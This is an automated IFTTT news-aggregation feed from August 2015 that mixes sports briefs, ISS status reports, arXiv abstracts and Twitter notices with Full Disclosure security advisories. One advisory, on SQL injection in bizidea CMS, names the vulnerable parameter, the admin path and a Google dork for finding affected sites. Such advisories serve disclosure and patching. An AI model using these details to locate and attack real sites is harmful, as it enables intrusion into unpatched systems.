ZURICH (AP) FIFA President Sepp Blatter has asked western Europe for ''a little good will'' to follow Russia and limit foreign players in club lineups.

from FOX Sports Digital http://ift.tt/1IKQiYc
via IFTTT

2 clubs in top Czech league fined for anti-Islam posters

PRAGUE (AP) Two clubs in the top Czech division have been fined by the country's football federation for anti-Islam messages held up by their fans.

from FOX Sports Digital http://ift.tt/1J2sZpU
via IFTTT

Boring no more, Chelsea goes to City embroiled in doc row

LONDON (AP) How Jose Mourinho must long for the days last season when Chelsea was being goaded for being ''boring.'' The start to the new campaign has been anything but mundane at Stamford Bridge.

from FOX Sports Digital http://ift.tt/1TxCRxU
via IFTTT

Augsburg signs Ghana defender Daniel Opare

AUGSBURG, Germany (AP) Augsburg says it has signed Ghana defender Daniel Opare from Porto on a three-year deal.

from FOX Sports Digital http://ift.tt/1Wm1Eco
via IFTTT

Press TV

Anonymous hacks scores of Israeli official websites in revenge for the release of suspects in an arson attack on a Palestinian home.

from Google Alert - anonymous http://ift.tt/1NsK2Wq
via IFTTT

ISS Daily Summary Report – 08/12/15

Direct Current Switching Unit (DCSU) 4A Power On Reset (POR): Tuesday evening at 6:10 pm CDT DCSU-4A experienced a POR. Power was lost to 3 downstream Direct Current-to-Direct Current Converter Units (DDCUs) plus the DDCU on the P4 Integrated Equipment Assembly (IEA). Service Module voltage and current stabilizers [CHT]s 23 and 24 also lost power but [CHT]s 21 and 22 were still available, resulting in only a small power deficit to the Russian segment. Of the 3 DDCUs, all were in paralleled pairs, but Parallel Input Undervoltage Protection (PIUV) was enabled for the Node 3 pair, meaning the 1B4A bus lost all power. The loads that lost power included: 4A Pump Flow and Control Subsystem (PFCS), Permanent Multipurpose Module (PMM), Treadmill 2, Hub Control Zone 1 Multiplexer/Demultiplexer (HCZ-1 MDM), Node3-1 MDM, Oxygen Generator System (OGS), Node3 Common Cabin Air Assembly (CCAA), Node3 Moderate Temperature Loop (MTL), Node3 Carbon Dioxide Removal Assembly (CDRA), and [CHT]s 23 and 24. The crew was woken up and, with the loss of the CCAA, were prime for smoke detection in Node 3 and the PMM. Ground teams reviewed the DCSU 4A data and found no indications of hardware problems. Ground teams are still in the process of recovering and reconfiguring Environmental Control and Life Support Systems (ECLSS). Teams have had some issues recovering the Node 3 CDRA. Lab CDRA has been activated in the interim while teams continue troubleshooting.

HRP Operations: Kelly and Kornienko performed a Reaction Self-Test upon wake-up and prior to sleep. Kelly completed Observation #10 of the Habitability study and his FD 135 Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max session.
Reaction Self-Test aids crewmembers to objectively identify when their performance capability is degraded by various fatigue-related conditions that can occur as a result of ISS operations and time in space (e.g., acute and chronic sleep restriction, slam shifts, extravehicular activity (EVA), and residual sedation from sleep medications). Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as Near Earth Asteroids (NEA) and Mars. The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Kelly performed his Sprint exercise session on the Cycle Ergometer with Vibration Isolation and Stabilization (CEVIS). The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight.   Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Zero Robotics Preparations: Kononenko completed an On-Board Training (OBT) and procedure review in advance of the Zero Robotics Dry-Run scheduled for tomorrow. The SPHERES Zero Robotics investigation establishes an opportunity for high school students to design research for the ISS. As part of a competition, students write algorithms for the SPHERES satellites to accomplish tasks relevant to future space missions. The algorithms are tested by the SPHERES team and the best designs are selected for the competition to operate the SPHERES satellites on board the ISS.   
Radi-N Neutron Field Study (Radi-N): Kononenko handed over the eight Radi-N detectors to Lindgren who deployed them around the ISS. The objective of this investigation is to better characterize the ISS neutron environment, define the risk posed to crewmembers' health and provide the data necessary to develop advanced protective measures for future space flight.

On-board Training (OBT) H-II Transfer Vehicle (HTV) Robotics Onboard Trainer (ROBoT) Session 1: In preparation for HTV5 arrival scheduled on August 20, Lindgren, Yui and Kelly participated in this training session. The crew practiced a 30 meter approach and two Capture Point hold runs.

Japanese Experiment Module (JEM) Pressurized Module (JPM)1F2 Activities: In preparation for the Multi-purpose Small Payload Rack (MSPR) arriving on HTV5 and subsequent installation, Lindgren relocated items stowed in the JPM1F2. Then Yui removed the hard dummy panel and JEM blue stowage rack, replaced the Active Rack Isolation System (ARIS) pivot fitting bottom and installed a soft dummy panel.

Mobile Servicing System (MSS) Operations: Today, the Robotics Ground Controllers powered up the Mobile Servicing System (MSS) and translated the Mobile Transporter (MT) from Worksite 4 (WS4) to WS5. Prior to the translation they continued the MSS Checkouts in preparation for HTV5 capture on GMT 232 (20 Aug 15). MSS performance today was nominal.

Today's Planned Activities
All activities were completed unless otherwise noted.
Reaction Time Test (morning)
SPRINT – Hardware Warmup
ISS Crew / SSIPC FD Conference
Countermeasures System (CMS) – Heart Rate Monitor Battery Changeout
Formaldehyde Monitoring Kit (FMK) Deployment Ops
CMS – HRM – iPAD Configuration
GSC Sampling Operations
SPRINT Experiment Ops
JEM – Relocating JPM1F2 Stowage
SPVO2 Cleaning and Relocation
Gas Analyzer О2 Readings Adjustments
Comm Config prior to MRM1 Ops
MRM1 ГК2 Replaceable Unit (БС) R&R r/g 9589
PAO Crew Prep / r/g 9598
JEM – Hard Dummy Panel (HDP) Removal
TV-session with Vesty Show Host r/g 9598
Installation of ЗУ-С charger No.13010004
Mating telemetry connectors to ЗУ-С
Set up the first Orlan-MK battery pack for discharge and start discharging the first pack
JEM – Blue Stowage Rack JBSR Removal from JPM1F2
SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module r/g 9013
JEM – PIVOT Fitting Replacement
Closing USOS Window Shutters
HABIT – Hardware Activation
JEM – Soft Dummy Panel (SDP) Installation
Restoring Nominal Comm Configuration
EVA-41 Debrief. (S-band, VHF)
SPHERES – OBT
OBT – On-board Training (OBT) HTV Robotics Onboard Trainer (ROBoT) Session 1
SPHERES Crew Conference
IFM Node 3 Deck Starboard IMV Cleaning
ALGOMETRIA. Experiment Ops / r/g 9591
NAPOR-miniRSA. Cleaning БЗУ-М Ventilation Vents / r/g 9593
Setup Disassembly and REMOTE RS LAPTOP stowage (Remote SM CP work station) / r/g 9559
ALGOMETRIA. Experiment […]

from ISS On-Orbit Status Report http://ift.tt/1IK36OB
via IFTTT

Bundesliga starts with Bayern Munich as big favorite

FRANKFURT, Germany (AP) Bayern Munich kicks off the Bundesliga season in the familiar role of favorite for a historic fourth consecutive title despite questions hanging over the future of coach Pep Guardiola.

from FOX Sports Digital http://ift.tt/1h5mMDJ
via IFTTT

Marseille looking for new coach following Bielsa's departure

PARIS (AP) The season couldn't have started worse for Marseille.

from FOX Sports Digital http://ift.tt/1P8MnWV
via IFTTT

Bayer Leverkusen signs Chile midfielder Charles Aranguiz

LEVERKUSEN, Germany (AP) Bayer Leverkusen has signed Chile midfielder Charles Aranguiz from Brazilian club Internacional on a five-year deal.

from FOX Sports Digital http://ift.tt/1Ncfc6v
via IFTTT

Donate

In keeping with Tradition Seven, you must be an A.A. Member to make a contribution. “Every A.A. group ought to be fully self-supporting, declining ...

from Google Alert - anonymous http://ift.tt/1L7wwtH
via IFTTT

Lenovo Caught Using Rootkit to Secretly Install Unremovable Software

Two years ago Chinese firm Lenovo got banned from supplying equipment for networks of the intelligence and defense services various countries due to hacking and spying concerns. Earlier this year, Lenovo was caught red-handed for selling laptops pre-installed with Superfish malware. One of the most popular Chinese computer manufacturers ‘Lenovo’ has been caught once again using a hidden


from The Hacker News http://ift.tt/1JVb89s
via IFTTT

[FD] Cisco Unified Communications Manager Multiple Vulnerabilities (VP2015-001)

[FD] Zend Framework <= 2.4.2 XML eXternal Entity Injection (XXE) on PHP FPM

=============================================
- Release date: 12.08.2015
- Discovered by: Dawid Golunski
- Severity: High
- CVE-ID: CVE-2015-5161
=============================================

I. VULNERABILITY


Milky Way and Exploding Meteor


Tonight the Perseid Meteor Shower reaches its maximum. Grains of icy rock will streak across the sky as they evaporate during entry into Earth's atmosphere. These grains were shed from Comet Swift-Tuttle. The Perseids result from the annual crossing of the Earth through Comet Swift-Tuttle's orbit, and are typically the most active meteor shower of the year. Although it is hard to predict the level of activity in any meteor shower, in a clear dark sky an observer might see a meteor a minute. This year's Perseids occur just before a new Moon and so the relatively dark sky should make even faint meteors visible. Meteor showers in general are best seen from a relaxing position, away from lights. Featured here is a meteor caught exploding two weeks ago above Austria next to the central band of our Milky Way Galaxy. via NASA http://ift.tt/1DLQVSs

Wednesday, August 12, 2015

Impact draw Whitecaps 2-2 in Canadian final opener

MONTREAL (AP) Laurent Ciman and Anthony Jackson-Hamel scored in a late 1-minute span to help the Montreal Impact draw 2-2 with the Vancouver Whitecaps in the Canadian Championship final Wednesday.

from FOX Sports Digital http://ift.tt/1L75vqf
via IFTTT

[FD] Update: Backdoor and RCE found in 8 TOTOLINK router models

Hello,

This is an update to:
- Backdoor and RCE found in 8 TOTOLINK router models (http://ift.tt/1HzOWgm)
- Backdoor credentials found in 4 TOTOLINK router models (http://ift.tt/1I56d4K)
- 4 TOTOLINK router models vulnerable to CSRF and XSS attacks (http://ift.tt/1I56fcE)
- 15 TOTOLINK router models vulnerable to multiple RCEs (http://ift.tt/1HzOYVn)

Totolink has released new firmwares on 2015-07-25 and also removed the old firmwares from their website. The backdoor is still present in the new firmware images but it is not launched at the startup anymore. You can check yourself by downloading the images and by using binwalk.

Example with N300RH-V2:

    $ wget -O 'TOTOLINK%20N300RH-V2.0.1_20150725.zip' 'http://ift.tt/1TvG0Oz'
    $ 7z x TOTOLINK%20N300RH-V2.0.1_20150725.zip
    [...]
    $ binwalk -e *web
    DECIMAL HEXADECIMAL DESCRIPTION


Learning to Hire Teams. (arXiv:1508.02823v1 [cs.AI])

Crowdsourcing and human computation has been employed in increasingly sophisticated projects that require the solution of a heterogeneous set of tasks. We explore the challenge of building or hiring an effective team, for performing tasks required for such projects on an ongoing basis, from an available pool of applicants or workers who have bid for the tasks. The recruiter needs to learn workers' skills and expertise by performing online tests and interviews, and would like to minimize the amount of budget or time spent in this process before committing to hiring the team. How can one optimally spend budget to learn the expertise of workers as part of recruiting a team? How can one exploit the similarities among tasks as well as underlying social ties or commonalities among the workers for faster learning? We tackle these decision-theoretic challenges by casting them as an instance of online learning for best action selection. We present algorithms with PAC bounds on the required budget to hire a near-optimal team with high confidence. Furthermore, we consider an embedding of the tasks and workers in an underlying graph that may arise from task similarities or social ties, and that can provide additional side-observations for faster learning. We then quantify the improvement in the bounds that we can achieve depending on the characteristic properties of this graph structure. We evaluate our methodology on simulated problem instances as well as on real-world crowdsourcing data collected from the oDesk platform. Our methodology and results present an interesting direction of research to tackle the challenges faced by a recruiter for contract-based crowdsourcing.



from cs.AI updates on arXiv.org http://ift.tt/1DOeZnD
via IFTTT

OOASP: Connecting Object-oriented and Logic Programming. (arXiv:1508.03032v1 [cs.AI])

Most contemporary software systems are implemented using an object-oriented approach. Modeling phases -- during which software engineers analyze requirements for the future system using some modeling language -- are an important part of the development process, since modeling errors are often hard to recognize and correct.

In this paper we present a framework which allows the integration of Answer Set Programming into the object-oriented software development process. OOASP supports reasoning about object-oriented software models and their instantiations. Preliminary results of the OOASP application in CSL Studio, which is a Siemens internal modeling environment for product configurators, show that it can be used as a lightweight approach to verify, create and transform instantiations of object models at runtime and to support the software development process during design and testing.



from cs.AI updates on arXiv.org http://ift.tt/1DOeZnB
via IFTTT

Trend Filtering on Graphs. (arXiv:1410.7690v4 [stat.ML] UPDATED)

We introduce a family of adaptive estimators on graphs, based on penalizing the $\ell_1$ norm of discrete graph differences. This generalizes the idea of trend filtering [Kim et al. (2009), Tibshirani (2014)], used for univariate nonparametric regression, to graphs. Analogous to the univariate case, graph trend filtering exhibits a level of local adaptivity unmatched by the usual $\ell_2$-based graph smoothers. It is also defined by a convex minimization problem that is readily solved (e.g., by fast ADMM or Newton algorithms). We demonstrate the merits of graph trend filtering through examples and theory.



from cs.AI updates on arXiv.org http://ift.tt/ZXUQsd
via IFTTT

Orioles Video: Baltimore no-hit by Hisashi Iwakuma of Mariners; first time team no-hit since 2007 (Clay Buchholz) (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Videos of racism in English soccer can be uploaded to app

LONDON (AP) Fans and players in England who experience or witness racism or discrimination at soccer games or on social media will be able to upload videos and pictures of incidents via a mobile phone application.

from FOX Sports Digital http://ift.tt/1UDFgcI
via IFTTT

Mariners: Hisashi Iwakuma's no-hitter was the team's 5th in franchise history and 3rd in last 4 seasons (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Breaking: Mariners P Hisashi Iwakuma throws no-hitter against Orioles; 7 K, 116 pitches in first career complete game (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Mariners P Hisashi Iwakuma has no-hitter in 9th inning vs. Orioles; tune to SportsCenter on ESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Breaking: Mariners P Hisashi Iwakuma has a no-hitter through 8 innings against the Orioles; 7 K, 107 pitches (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Hearts goes top of Scottish league as Celtic draws

GLASGOW, Scotland (AP) Hearts went top of the Scottish league on Wednesday after Celtic conceded a late penalty in a 2-2 draw against Kilmarnock.

from FOX Sports Digital http://ift.tt/1IHORK4
via IFTTT

I have a new follower on Twitter


Miles Anthony Smith
Husband/Father, #Ambivert, #SerialSpecialist, Digital Marketer & #Audiobook Author Why #Leadership Sucks & Becoming #Generation Flux http://t.co/FUkXa8Pxil
Green Bay, Wisconsin
http://t.co/NAXy3aaINK
Following: 3122 - Followers: 3995

August 12, 2015 at 05:53PM via Twitter http://twitter.com/Miles_Anthony

MLB: Mariners P Hisashi Iwakuma has a no-hitter through 7 innings against the Orioles; 6 K, 90 pitches (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Re: [FD] The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)

Measuring the Longitudinal Evolution of the Online Anonymous Marketplace Ecosystem

successful online anonymous marketplace, in which buyers and sellers could transact with anonymity properties far superior to those available in ...

from Google Alert - anonymous http://ift.tt/1P7iXbG
via IFTTT

Anonymous Malaysia wants PM Najib Razak to resign, threatens cyber attack on Aug 29 , AsiaOne ...

Security at the information networks of 10 vital public-sector agencies is being tightened after hacktivist group Anonymous Malaysia threatened to ...

from Google Alert - anonymous http://ift.tt/1DNDJfR
via IFTTT

[FD] The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)

Details
================
Software: OAuth2 Complete For WordPress
Version: 3.1.3
Homepage: http://ift.tt/1deB0fP
Advisory report: http://ift.tt/1JdcUnH
CVE: Awaiting assignment
CVSS: 10 (High; AV:N/AC:L/Au:N/C:C/I:C/A:C)

Description
================
The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure.

Vulnerability
================
The following refer to the generateAccessToken() function in library/OAuth2/ResponseType/AccessToken.php, and the generateAuthorizationCode() function in library/OAuth2/ResponseType/AuthorizationCode.php.

These functions attempt to generate secure auth tokens, but do not use the WordPress random number generator. Instead they use a series of fallback calculations depending on which PHP version is being used. Some of these calculations are not cryptographically secure:

The first is mcrypt_create_iv(100, MCRYPT_DEV_URANDOM). MCRYPT_DEV_URANDOM is expected to change to a different random value whenever it is called, but on Windows, on older versions of PHP, it is known to be a constant value.

If no other functions (e.g. /dev/urandom) are available then the access token is generated solely using mt_rand(), microtime(), and uniqid(). mt_rand() (Mersenne twister) is not a cryptographically secure pseudorandom number generator. According to the documentation mt_rand() is also biased towards even return values in some circumstances. According to the documentation uniqid() is as secure a PRNG as microtime().

Proof of concept
================
See the documentation:
http://ift.tt/1IHnLTn
http://ift.tt/1ntsSyj

Mitigations
================
Upgrade to version 3.1.5 or later. If this is not possible then ensure that you are using a recent version of PHP (at least 5.3), or disable the plugin.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2014-04-16: Discovered
2015-07-21: Reported to vendor by email
2015-07-21: Requested CVE
2015-08-10: Vendor responded
2015-08-11: Vendor confirmed fixed in version 3.1.5
2015-08-12: Published

Discovered by dxw:
================
Tom Adams

Please visit security.dxw.com for more information.


Re: [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)

[FD] BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability

Blue Frost Security GmbH http://ift.tt/1IH5eGS research(at)bluefrostsecurity.de BFS-SA-2015-001 12-August-2015


[FD] Open source tool for applying Google Chrome security updates

The Problem

If you are a network administrator, keeping browsers updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China (no Google services), updating Chrome is not an easy task.

The Solution

The official blog of Chrome Releases contains a lot of information. Code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether the visitor's Chrome is exactly the same.

Security

The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript.

URLs

Source Code: http://ift.tt/1JUaf18
Home Page: http://ift.tt/1JLvphJ
Latest Stable Chrome: http://ift.tt/1Nr14nJ


Mariners: RF Nelson Cruz is not in Wednesday's lineup vs. Orioles after leaving Tuesday's game with neck spasms (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Traci Jones
The reports of my death have been greatly exaggerated.
Los Angeles

Following: 524 - Followers: 354

August 12, 2015 at 03:07PM via Twitter http://twitter.com/TraciJones79

Costa Rican national team coach Wanchope resigns following fight at game in Panama

SAN JOSE, Costa Rica (AP) Costa Rican national team coach Wanchope resigns following fight at game in Panama.

from FOX Sports Digital http://ift.tt/1MkBtxW
via IFTTT

Mariano Nunez (@marianonunezdc) favorited one of your Tweets!

Mariano Nunez favorited your Tweet: Patrick McGuire @mistermcguire: [FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure… ift.tt/1IZjmIG


Find a Meeting

This is the full meeting database, ideally more up to date than the printed meeting list. If you have any problems finding meetings, please call the ...

from Google Alert - anonymous http://ift.tt/1L664AP
via IFTTT

I have a new follower on Twitter


Flow
Rapidly Design and Deploy Custom Cloud Based Data Automation Solutions.

https://t.co/HixZvF6akh
Following: 1157 - Followers: 769

August 12, 2015 at 12:35PM via Twitter http://twitter.com/flow_analytics

[FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage




[FD] [Onapsis Security Advisory 2015-010] SAP Mobile Platform DataVault Keystream Recovery




[FD] [Onapsis Security Advisory 2015-011] SAP Mobile Platform DataVault Predictable encryption passwords for Configuration Values




Messi, Suarez, Ronaldo in running for UEFA Best Player award

NYON, Switzerland (AP) Lionel Messi and Luis Suarez of Champions League winner Barcelona will compete with Real Madrid's Cristiano Ronaldo for UEFA's Best Player in Europe award for last season.

from FOX Sports Digital http://ift.tt/1WiHXSQ
via IFTTT

Costa Rica coach Wanchope in stadium fist fight

PANAMA CITY (AP) Costa Rica coach Paulo Wanchope has found himself in a fist fight while watching his country's under-23 team play in Panama.

from FOX Sports Digital http://ift.tt/1IGrPn5
via IFTTT

ISS Daily Summary Report – 08/11/15

Human Research Program (HRP) Operations: Yui completed his Flight Day 15 (FD15) Biochemical Profile Urine collections.  Kelly completed his second of three Journals sessions and his third task observation video for Habitability. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results which scientists can use to study the effects of spaceflight on the body. Journals obtains information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. Study results provide information to help prepare for future missions to low-Earth orbit and beyond. Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as Near Earth Asteroids (NEA) and Mars. The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Observations during the 1-year mission, as well as 6-month missions, can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Capillary Effects of Drinking in the Microgravity Environment (Capillary Beverage): Microgravity affects the way fluids behave, and as such, crew members must drink from special sealed bags instead of using straws or normal cups. Capillary Beverage studies the process of drinking from specially designed space cups that use fluid dynamics to mimic the effect of gravity. 
In this session, Yui used water to demonstrate how a complex fluid reacts to the cup's special designs in an attempt to mimic the gravitational flow of a liquid through capillary forces. High definition video was used to capture the data for ground analysis.

Integrated Resistance and Aerobic Training Study (SPRINT) Configuration: Kelly and Yui configured the Portable Pulmonary Function System (PPFS) in advance of the Sprint Volume of Oxygen Utilized (VO2) Max sessions on Wednesday for Kelly and Thursday for Yui. Sprint evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in International Space Station (ISS) crewmembers during long-duration missions.

Extravehicular Activity (EVA) Tool Stow: Kelly stowed US tools used by the Russian crew during yesterday's Russian EVA #41.

Oxygen Generation Assembly (OGA) Hydrogen Sensor Remove and Replace (R&R): Last Thursday's Velocicalc reading of the air flow rate into the OGS Rack AAA showed it to be below 450 ft/min versus the expected range of 900 ft/min. Sufficient air flow through the OGS Rack serves as a hazard mitigation against oxygen (O2) concentrations forming within the rack should an O2 leak develop. Following discussions within the engineering and operations community, a short term recommendation was made to continue running the OGA to retain O2 production but increase the AAA fan speed to help increase air mixing within the rack. Over the weekend the crew took another reading and found the flow to still be less than 450 ft/min. The team decided to power off the OGS rack after the crew day on Sunday. Today Lindgren R&Rd the OGS Hydrogen Sensor Orbital Replacement Unit (ORU), as well as AAA cleaning and inlet inspection to recover OGA functionality. The team is currently reactivating the OGA and the crew will perform Velocicalc readings on Thursday.
Water Recovery System (WRS) Separator Plumbing Assembly (SPA) Vent Line Build: For several months, ground teams have suspected the SPA vent hose is restricted due to microbial growth. There is no microbial control in the purge lines and no designated way to clean them if growth occurs. Since there are no spare SPA vent hoses onboard, today Kelly built an alternate SPA Vent Line by removing the end fittings from an existing Iodine Removal Hose. Later this week the crew will install this hose to eliminate the restriction and return the Urine Processing Assembly (UPA) to nominal operations.

Space Station Remote Manipulator System (SSRMS) Operations: Today, the Robotics Ground Controllers powered up the Mobile Servicing System (MSS) and maneuvered the SSRMS to stow the Special Purpose Dexterous Manipulator (SPDM) on the Lab Power Data Grapple Fixture (PDGF). SSRMS Latching End Effector B (LEE-B) was then released from the SPDM PDGF and the SSRMS was maneuvered into position for the start of the ISS Crew H-II Transfer Vehicle 5 (HTV5) Offset Grapples Practice on GMT 225 (13 Aug 15). The Robotics Ground Controllers also performed MSS Checkouts in preparation for HTV5 capture on GMT 232 (20 Aug 15). MSS performance today was nominal.

Today's Planned Activities
All activities were completed unless otherwise noted.
HRF – Sample MELFI Insertion
USOS Window Shutter closure
ISS HAM. Radio activation
JRNL – Log Entry
HRF – Hardware Stowage After Sampling
Crew preparation for PAO
Hardware preparation for PAO
PAO
PHS Hardware installation
Periodic Health Status (PHS) Evaluation – CMO
Periodic Health Status (PHS) Evaluation – Subject
Tag up with specialists on "Orlan" spacesuit after EVA ВКД
Periodic Health Status (PHS) Evaluation – Subject
Periodic Health Status (PHS) Evaluation – CMO
Data Recording on Periodic Health Status (PHS) Evaluation and Hardware stowage
EDV (КОВ) Fill (separation) for "Elektron" System or EDV-CB
Fill installed EDV (КОВ) 1137 from ЕDV 1005
US video camera, light and REBA power unit de-installation from spacesuits r/g 9529, 9530
WRS – Recycle Tank Fill
"Orlan-МК" Spacesuit water supply line drying
Charging D2Xs camera batteries for ВСАТ
HRF- reconfig
"Elektron-BM" [БЖ] (Liquid compartment) Pressurization prior to activation
CAPBEV- Preparation Ops
Water Tank Refill of Spacesuits ##4 and 6
HABIT – Videorecording Start
OGA: hydrogen sensor R&R, part 1
"Оrlan-МК" Spacesuit Drying – Start
SPRINT- Program Loading
HABIT – Videorecording End
CAPBEV
Progress #428 and DC1 Interface Leak Check
Medical Kit Return to Nominal Stowage Location After EVA / r/g 9562
WRS – SPA Ventilation Line Configuration
CAPBEV- Equipment Test Photography […]

from ISS On-Orbit Status Report http://ift.tt/1L5FzLJ
via IFTTT

[FD] bizidea Design CMS 2015Q3 - SQL Injection Vulnerability

Document Title:
===============
bizidea Design CMS 2015Q3 - SQL Injection Vulnerability

References (Source):
====================
http://ift.tt/1HFGTxl

Release Date:
=============
2015-08-12

Vulnerability Laboratory ID (VL-ID):
====================================
1571

Common Vulnerability Scoring System:
====================================
8.7

Product & Service Introduction:
===============================
http://ift.tt/1N9VCaK

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote sql injection web vulnerability in the official bizidea Design content management system.

Vulnerability Disclosure Timeline:
==================================
2015-08-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Bizidea Co. Ltd.
Product: BizIdea - Content Management System (Web-Application) 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official bizidea Design content management system. The vulnerability allows remote attackers to execute their own sql commands to compromise the web-application or database management system.

The vulnerability is located in the `news_id` value of the `index.php` file. Remote attackers are able to execute their own sql commands by manipulating the GET method request with the vulnerable news_id parameter. The request method to inject the sql command is GET and the issue is located on the application side of the online service.

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] news_id

Proof of Concept (PoC):
=======================
The sql injection web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Admin UI: /admin

Google Dork(s): "Powered by bizidea.co.th"

PoC: http://ift.tt/1HGbwmh SQL INJECTION VULNERABILITY!]

Solution - Fix & Patch:
=======================
The sql injection vulnerability can be patched by usage of a secure prepared statement or entity on requests via GET with the vulnerable news_id value. Disallow special chars and escape to filter the input of the parameter.

Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the bizidea content management system is estimated as high. (CVSS 8.7)

Credits & Authors:
==================
wild.soldier(behrouz mansoori) - Danger Security Team
SPT: Nima Danger , Mehran_FLash and all Members ...

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab
Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS
Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Source: Gmail -> IFTTT-> Blogger

Czech captain Tomas Rosicky could miss Euro 2016 qualifiers

PRAGUE (AP) Czech Republic captain Tomas Rosicky could miss European Championship qualifiers against Kazakhstan and Latvia in September.

from FOX Sports Digital http://ift.tt/1HG2vcJ
via IFTTT

Soccer player treated for cancer wins case over stopped pay

LAUSANNE, Switzerland (AP) A football player whose contract was suspended by his club while he was treated for cancer has been awarded ''moral damages'' of around $60,000.

from FOX Sports Digital http://ift.tt/1L5sZMG
via IFTTT

Footballer treated for cancer wins case over stopped pay

LAUSANNE, Switzerland (AP) The Court of Arbitration for Sport has awarded ''moral damages'' of around $60,000 to a football player whose contract was suspended while he was treated for cancer.

from FOX Sports Digital http://ift.tt/1MjCl5W
via IFTTT

I have a new follower on Twitter


Zach Alfaro
Online marketers have very busy lives. I'll help you lead a more productive, successful & happy lifestyle through science-backed research & psychological hacks
Australia
http://t.co/GJPRvVxGDX
Following: 3503 - Followers: 3424

August 12, 2015 at 05:47AM via Twitter http://twitter.com/Kaizen_Creative

Contact Us

This is the official web site of Chicago Area Alcoholics Anonymous. Graphic ... Anonymous and Alcoholics Anonymous World Services, Inc. www.aa.org.

from Google Alert - anonymous http://ift.tt/1L4YOlW
via IFTTT

Harald Nielsen, who scored 6 at 1960 Olympics, dies at 73

